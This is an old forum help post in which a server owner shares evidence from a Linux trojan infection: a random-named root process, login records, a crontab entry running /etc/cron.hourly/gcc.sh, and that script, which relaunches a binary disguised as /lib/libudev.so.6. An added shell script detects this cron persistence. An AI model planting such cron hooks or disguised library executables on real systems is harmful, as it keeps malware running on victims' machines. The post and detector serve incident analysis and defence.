[Old post] [Help] A trojan sample, looking for ideas on how to crack it
Posted on: 2016-6-12 11:32 1634
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
3494 root 19 0 378m 25m 212 R 1595.6 0.7 5798:34 eyshcjdmzg
-bash-4.3# last -10
user pts/3 11X.25.49.200 Mon Jun 6 23:46 - 01:47 (02:01)
Intrusion path: an ordinary broadband user
-bash-4.3# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
*/3 * * * * root /etc/cron.hourly/gcc.sh
-bash-4.3# vi /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done # actively bring up the network interfaces
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
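
As an added example (not part of the original post), a triage check for the cron persistence shown above: it lists crontab entries that call a file in /etc/cron.* directly rather than through run-parts, and reports when such a script runs a path named like a shared library. The function names, the ROOT argument and the constructed sample tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): triage a mounted or copied
# filesystem for the cron persistence pattern shown above.
# Assumption: ROOT is the directory holding the suspect tree.

# Print commands from a system crontab that call a file inside /etc/cron.*
# directly instead of through run-parts (the "*/3 ... gcc.sh" line above).
flag_cron_lines() {
    awk '/^[ \t]*#/ || NF < 7 || $1 ~ /=/ { next }
         $7 ~ /^\/etc\/cron\.(hourly|daily|weekly|monthly)\// { print $7 }' "$1"
}

# Print paths that a script runs as a command although they are named like
# shared objects under a lib directory (the "/lib/libudev.so.6" line above).
flag_so_exec() {
    awk '$1 ~ /^\/(usr\/)?lib(64)?\/.*\.so(\.[0-9]+)*$/ { print $1 }' "$1"
}

# Join both checks: "<cron script> runs <shared-object path>", one per line.
triage() {
    root=$1
    [ -f "$root/etc/crontab" ] || return 0
    flag_cron_lines "$root/etc/crontab" | sort -u | while read -r script; do
        [ -f "$root$script" ] || { echo "$script missing"; continue; }
        flag_so_exec "$root$script" | while read -r so; do
            echo "$script runs $so"
        done
    done
}

# Constructed sample tree reproducing the lines quoted in the post.
make_sample() {
    d=$(mktemp -d) && mkdir -p "$d/etc/cron.hourly" || return 1
    cat > "$d/etc/crontab" <<'EOF'
SHELL=/bin/bash
MAILTO=root
# run-parts
01 * * * * root run-parts /etc/cron.hourly
*/3 * * * * root /etc/cron.hourly/gcc.sh
EOF
    cat > "$d/etc/cron.hourly/gcc.sh" <<'EOF'
#!/bin/sh
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
EOF
    echo "$d"
}

sample=$(make_sample)
triage "$sample"
rm -rf "$sample"
```

A "missing" result is also worth following up, since it means the crontab still points at a script that has been removed or not yet re-created.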